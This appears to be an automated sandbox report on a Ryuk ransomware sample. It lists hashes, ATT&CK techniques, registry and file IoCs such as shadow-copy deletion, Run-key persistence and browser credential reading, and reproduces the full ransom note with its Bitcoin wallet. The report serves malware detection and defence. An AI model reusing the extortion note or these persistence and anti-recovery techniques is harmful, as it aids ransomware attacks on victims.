ryuk | e88f86634b1a30b45429d6f721fef75902fb55a78629f1c0193e1629e955a55d

Analysis

max time kernel
75s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
26-12-2024 17:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eiavW.exe
Size

172KB
MD5

c0202cf6aeab8437c638533d14563d35
SHA1

5767653494d05b3f3f38f1662a63335d09ae6489
SHA256

8d3f68b16f0710f858d8c1d2c699260e6f43161a5510abb0e7ba567bd72c965b
SHA512

02516128d43914d6ff1b7e702d25771aafd2edccee1729f88ad621cea15a648bb2737b87f564e0711e6f8f99c43eb406b3b6137c68086774f1417642d51c07c0
SSDEEP

3072:tEyekjv8/eFJ59W2+yV3XgDJ/nptkIV77pJd7RQy+P/:qMo/eF7EDyVgFfn7QyK

Score

10^/10

ryuk defense_evasion discovery execution impact persistence ransomware spyware stealer

Malware Config

Extracted

Path

F:\RyukReadMe.txt

Family

ryuk

Ransom Note

Gentlemen! Your business is at serious risk. There is a significant hole in the security system of your company. We've easily penetrated your network. You should thank the Lord for being hacked by serious people not some stupid schoolboys or dangerous punks. They can damage all your important data just for fun. Now your files are crypted with the strongest millitary algorithms RSA4096 and AES-256. No one can help you to restore files without our special decoder. Photorec, RannohDecryptor etc. repair tools are useless and can destroy your files irreversibly. If you want to restore your files write to emails (contacts are at the bottom of the sheet) and attach 2-3 encrypted files (Less than 5 Mb each, non-archived and your files should not contain valuable information (Databases, backups, large excel sheets, etc.)). You will receive decrypted samples and our conditions how to get the decoder. Please don't forget to write the name of your company in the subject of your e-mail. You have to pay for decryption in Bitcoins. The final price depends on how fast you write to us. Every day of delay will cost you additional +0.5 BTC Nothing personal just business As soon as we get bitcoins you'll get all your decrypted data back. Moreover you will get instructions how to close the hole in security and how to avoid such problems in the future + we will recommend you special software that makes the most problems to hackers. Attention! One more time ! Do not rename encrypted files. Do not try to decrypt your data using third party software. P.S. Remember, we are not scammers. We don`t need your files and your information. But after 2 weeks all your files and keys will be deleted automatically. Just send a request immediately after infection. All data will be restored absolutely. Your warranty - decrypted samples. contact emails [email protected] or [email protected] BTC wallet: 15RLWdVnY5n1n7mTvU1zjg67wt86dhYqNj Ryuk No system is safe

Emails

[email protected]

Wallets

15RLWdVnY5n1n7mTvU1zjg67wt86dhYqNj

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Ryuk family
ryuk
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation	eiavW.exe

Drops startup file 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\RyukReadMe.txt	sihost.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos = "C:\\Users\\Admin\\AppData\\Local\\Temp\\eiavW.exe"	reg.exe

Enumerates connected drives 3 TTPs 20 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\D:	explorer.exe

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\lib\ct.sym	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Trial-ul-oob.xrm-ms	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Retail-ppd.xrm-ms	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Word2019VL_MAK_AE-ppd.xrm-ms	sihost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\de-de\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\es-ES\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\lib\jawt.lib	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\Library\Analysis\ANALYS32.XLL	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lets-get-started-2x.png	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pl-pl\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\it-it\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_KMS_Client-ppd.xrm-ms	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-140.png	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PowerPointCombinedFloatieModel.bin	sihost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ga\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\remove.svg	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\da-dk\ui-strings.js	sihost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\deploy\splash_11-lic.gif	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_ViewOnly_ZeroGrace-ul-oob.xrm-ms	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Retail-pl.xrm-ms	sihost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\he-il\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\word2013bw.dotx	sihost.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\vlc.mo	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\1033\ApothecaryResume.dotx	sihost.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\Mu\CompatExceptions	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\new_icons_retina.png	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\css\tool-view.css	sihost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\ext\sunmscapi.jar	sihost.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\legal\jdk\relaxngom.md	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\3082\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.scale-140.png	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\fillandsign.svg	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\PlayStore_icon.svg	sihost.exe
File opened for modification	C:\Program Files\Java\jre-1.8\legal\jdk\icu.md	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PPKLite.api	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\LightTheme.acrotheme	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\es-es\ui-strings.js	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ca-es\ui-strings.js	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\sendforcomments.svg	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-gb\ui-strings.js	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sv-se\ui-strings.js	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\he-il\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-il\ui-strings.js	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ca-es\ui-strings.js	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-ppd.xrm-ms	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL103.XML	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PROOF\MSGR8EN.LEX	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\it-it\ui-strings.js	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_zh_cn_135x40.svg	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_MAK_AE-ul-oob.xrm-ms	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ui-strings.js	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\da-dk\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\RyukReadMe.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_KMS_Client_AE-ppd.xrm-ms	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\client_eula.txt	sihost.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\dcf.x-none.msi.16.x-none.boot.tree.dat	sihost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	explorer.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A	explorer.exe
